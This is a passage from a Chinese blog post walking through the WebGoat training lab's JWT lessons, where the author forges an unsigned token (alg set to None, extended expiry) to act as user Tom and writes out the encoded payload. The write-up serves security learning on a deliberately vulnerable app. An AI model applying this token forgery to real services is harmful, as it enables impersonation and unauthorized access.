loading="lazy"><br>复制到提交处，就可以了。(PS：但是我的环境可能是很有问题的，重新搭建好几遍了，还是答案不对)<br>可以参考一下这位师傅的博客，过程没问题，就是答案提交了不正确。也不纠结了。pass！参考链接——<a target="_blank" rel="noopener" href="https://www.jianshu.com/p/d2f9815758f4">https://www.jianshu.com/p/d2f9815758f4</a><br><font color=#F22225 >第七关Refreshing a token</font><br><font color=#999AAA ></p>
<p>点击这里查看日志。<br><img src="https://img-blog.csdnimg.cn/20200817182823546.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>在日志文件中发现历史记录的token，也就是过期的，和提交页面的URL，如下：<br><img src="https://img-blog.csdnimg.cn/20200817183007750.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>解码这个token，然后发现缺少了typ，既然是已经过期了的，那么时间肯定是不合适的。查阅资料了解到token的时间设定</p>
<blockquote>
<p>其中iat是token生成的时间，exp是token失效的时间，也就是直接改exp就行了。这个时间是根据1970计算机的时间纪元来计算的，也就是得知道当前的时间是多少，</p>
</blockquote>
<p>回到主页面，其中除了checkout，其他的点击了都是没有其他效果的。<br><img src="https://img-blog.csdnimg.cn/20200818184747661.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_FFFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>所以就只能选择在这个地方入手了。<br>思路：抓包，修改token。</p>
<p><img src="https://img-blog.csdnimg.cn/20200818210412128.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>返回不是用户tom，所以还是用到那个过期的token，但是日期是不正确的，<br><img src="https://img-blog.csdnimg.cn/20200818212605852.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>所以需要获取当前时间，然后进行编码。<br>时间获取：</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> time

<span class="token keyword">print</span><span class="token punctuation">(</span>time<span class="token punctuation">.</span>time<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span></code></pre>

<p><img src="https://img-blog.csdnimg.cn/20200818210558583.png#pic_center" alt="m0re" loading="lazy"><br>将这个时间加长一点。就可以变为有效期的token了。因为原本的token默认使用<code>HS512</code>来hash，还需要secret值，爆破方式上一关的脚本可以。然后再进行base64编码。<br>懒得爆破了，所以就学习知乎大师傅的方法，直接将不hash，直接将alg改为None。然后进行base64编码。后面的签名也可以不加，直接下面两种组合，构成payload。</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token punctuation">&#123;</span><span class="token string">"alg"</span><span class="token builtin class-name">:</span><span class="token string">"None"</span><span class="token punctuation">&#125;</span><span class="token operator">==</span><span class="token operator">></span>eyJhbGciOiJOb25lIn0<span class="token operator">=</span>
<span class="token punctuation">&#123;</span><span class="token string">"iat"</span>:1526131411,<span class="token string">"exp"</span>:1597757030,<span class="token string">"admin"</span><span class="token builtin class-name">:</span><span class="token string">"false"</span>,<span class="token string">"user"</span><span class="token builtin class-name">:</span><span class="token string">"Tom"</span><span class="token punctuation">&#125;</span><span class="token operator">==</span><span class="token operator">></span>eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTU5Nzc1NzAzMCwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ<span class="token operator">==</span></code></pre>
<p>提交的payload</p>
<pre class="language-bash" data-language="bash"><code class="language-bash"><span class="token assign-left variable">eyJhbGciOiJOb25lIn0</span><span class="token operator">=</span>.eyJpYXQiOjE1MjYxMzE0MTEsImV4cCI6MTU5Nzc1NzAzMCwiYWRtaW4iOiJmYWxzZSIsInVzZXIiOiJUb20ifQ<span class="token operator">==</span>.</code></pre>
<p>不要忘记了最后的“点”，那是分割符。<br>复制token，粘贴到</p>
<p><img src="https://img-blog.csdnimg.cn/20200818211815343.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>可以看到返回成功了，浏览器中也显示过关。</p>
<p><img src="https://img-blog.csdnimg.cn/20200818211031949.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br><font color=#F22225 >第八关Final challenges</font><br>参考上一关，方法一样。能做出来。<br>首先抓包，在这个位置找到token，然后去修改就可以了。<br><img src="https://img-blog.csdnimg.cn/20200818235525967.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"><br>发包，成功。</p>
<p><img src="https://img-blog.csdnimg.cn/2020081823541586.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQ1ODM2NDc0,size_16,color_1FFFFF,t_70#pic_center" alt="m0re" loading="lazy"></p>
<hr style=" border:solid; width:100px; height:1px;" color=#000000 size=1">

<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p><font color=#999AAA >这个靶场确实很好，综合漏洞靶场，学到了许多知识，先记录一部分，后面再另写一篇。继续加油。</p>
</div><div id="reward-container"><span class="hty-icon-button button-glow" id="reward-button" title="打赏" onclick="var qr = document.getElementById(&quot;qr&quot;); qr.style.display = (qr.style.display === &quot;none&quot;) ? &quot;block&quot; : &quot;none&quot;;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-hand-coin-line"></use></svg></span><div id="reward-comment">I'm so cute. Please give me a candy.</div><div id="qr" style="display:none;"><div style="display:inline-block"><a target="_blank" rel="noopener" href="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg"><img loading="lazy" src="https://gitee.com/m0re/picture/raw/master/img/wechatpay.jpg" alt="微信支付" title="微信支付"></a><div><span style="color:#2DC100"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-wechat-pay-line"></use></svg></span></div></div></div></div><ul class="post-copyright"><li class="post-copyright-author"><strong>本文作者：</strong>m0re</li><li class="post-copyright-link"><strong>本文链接：</strong><a href="https://m0re.top/posts/a9166075/" title="WebGoat靶场搭建及通关记录(一)">https://m0re.top/posts/a9166075/</a></li><li class="post-copyright-license"><strong>版权声明：</strong>本博客所有文章除特别声明外，均默认采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank" rel="noopener" title="CC BY-NC-SA 4.0 "><svg class="icon"><use xlink:href="#icon-creative-commons-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-by-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-nc-line"></use></svg><svg class="icon"><use xlink:href="#icon-creative-commons-sa-line"></use></svg></a> 许可协议。</li></ul></section></article><div class="post-nav"><div class="post-nav-item"><a class="post-nav-prev" href="/posts/e66c142/" rel="prev" title="2020强网杯部分题目复现"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-left-s-line"></use></svg><span class="post-nav-text">2020强网杯部分题目复现</span></a></div><div class="post-nav-item"><a class="post-nav-next" href="/posts/1d02ae7a/" rel="next" title="linux系统提权———基于已经拿到www-data权限"><span class="post-nav-text">linux系统提权———基于已经拿到www-data权限</span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-right-s-line"></use></svg></a></div></div></div><div class="hty-card" id="comment"><div class="comment-tooltip text-center"><span>尝试使用 utterances （基于 GitHub Issues）评论系统。</span><br><span>您可以点击下方按钮切换对应评论系统，</span><br><span><script>function showUtterances(){ document.querySelector(".utterances").style.display='block'; document.querySelector('#valine-container').style.display='none'; }function showValine(){ document.querySelector('#valine-container').style.display='block'; document.querySelector(".utterances").style.display='none'; }</script></span><br><span><a class="hty-button hty-button--raised" onclick="showValine()">Valine</a><a class="hty-button hty-button--raised" onclick="showUtterances()">utterances</a></span><br><span><style>.utterances{display:none;}</style></span><br></div><div id="valine-container"></div><script>Yun.utils.getScript("https://cdn.jsdelivr.net/npm/valine@latest/dist/Valine.min.js", () => {
  const valineConfig = {"enable":true,"appId":"gUEA9zKLhCnMFxQI5kI20WiD-gzGzoHsz","appKey":"GQKAp04LNloy3MrDMv86MI3i","placeholder":"评论一下~&nbsp_(:з」∠)_ （填写邮箱可以收到回复通知～）","avatar":null,"pageSize":10,"visitor":true,"highlight":true,"recordIP":true,"enableQQ":true,"requiredFields":["nick","mail"],"el":"#valine-container","lang":"zh-cn"}
  valineConfig.path = "/posts/a9166075/"
  new Valine(valineConfig)
}, window.Valine);</script></div></main><footer class="sidebar-translate" id="footer"><div class="beian"><a rel="noopener" href="https://beian.miit.gov.cn/" target="_blank">豫ICP备2020025591号-1</a></div><div class="copyright"><span>&copy; 2020 – 2021 </span><span class="with-love" id="animate"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-cloud-line"></use></svg></span><span class="author"> m0re</span></div><div class="powered"><span>由 <a href="https://hexo.io" target="_blank" rel="noopener">Hexo</a> 驱动 v5.1.0</span><span class="footer-separator">|</span><span>主题 - <a rel="noopener" href="https://github.com/YunYouJun/hexo-theme-yun" target="_blank"><span>Yun</span></a> v1.6.1</span></div><div class="live_time"><span>本博客已苟延残喘了</span><span id="display_live_time"></span><span class="moe-text">(●'◡'●)</span><script>function blog_live_time() {
  setTimeout(blog_live_time, 1000);
  const start = new Date('2020-02-21T00:00:00');
  const now = new Date();
  const timeDiff = (now.getTime() - start.getTime());
  const msPerMinute = 60 * 1000;
  const msPerHour = 60 * msPerMinute;
  const msPerDay = 24 * msPerHour;
  const passDay = Math.floor(timeDiff / msPerDay);
  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);
  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);
  const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);
  display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";
}
blog_live_time();
</script></div><div id="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_site_uv" title="总访客量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-user-line"></use></svg></span><span id="busuanzi_value_site_uv"></span></span><span class="footer-separator">|</span><span id="busuanzi_container_site_pv" title="总访问量"><span><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg></span><span id="busuanzi_value_site_pv"></span></span></div></footer><a class="hty-icon-button" id="back-to-top" aria-label="back-to-top" href="#"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-arrow-up-s-line"></use></svg><svg class="progress-circle-container" viewBox="0 0 100 100"><circle class="progress-circle" id="progressCircle" cx="50" cy="50" r="48" fill="none" stroke="#6200ee" stroke-width="2" stroke-linecap="round"></circle></svg></a><a class="popup-trigger hty-icon-button icon-search" id="search" href="javascript:;" title="搜索"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-search-line"></use></svg></span></a><script>window.addEventListener("DOMContentLoaded", () => {
  // Handle and trigger popup window
  document.querySelector(".popup-trigger").addEventListener("click", () => {
    document.querySelector(".popup").classList.add("show");
    setTimeout(() => {
      document.querySelector(".search-input").focus();
    }, 100);
  });

  // Monitor main search box
  const onPopupClose = () => {
    document.querySelector(".popup").classList.remove("show");
  };

  document.querySelector(".popup-btn-close").addEventListener("click", () => {
    onPopupClose();
  });

  window.addEventListener("keyup", event => {
    if (event.key === "Escape") {
      onPopupClose();
    }
  });
});
</script><script src="/js/search/local-search.js" defer></script><div class="popup search-popup"><div class="search-header"><span class="popup-btn-close close-icon hty-icon-button"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-close-line"></use></svg></span></div><div class="search-input-container"><input class="search-input" id="local-search-input" type="text" placeholder="搜索..." value=""></div><div id="local-search-result"></div></div></div><script src="https://cdn.jsdelivr.net/npm/live2d-widget@^3.1.3/lib/L2Dwidget.min.js"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"https://cdn.jsdelivr.net/npm/live2d-widget-model-wanko@1.0.5/assets/wanko.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body></html>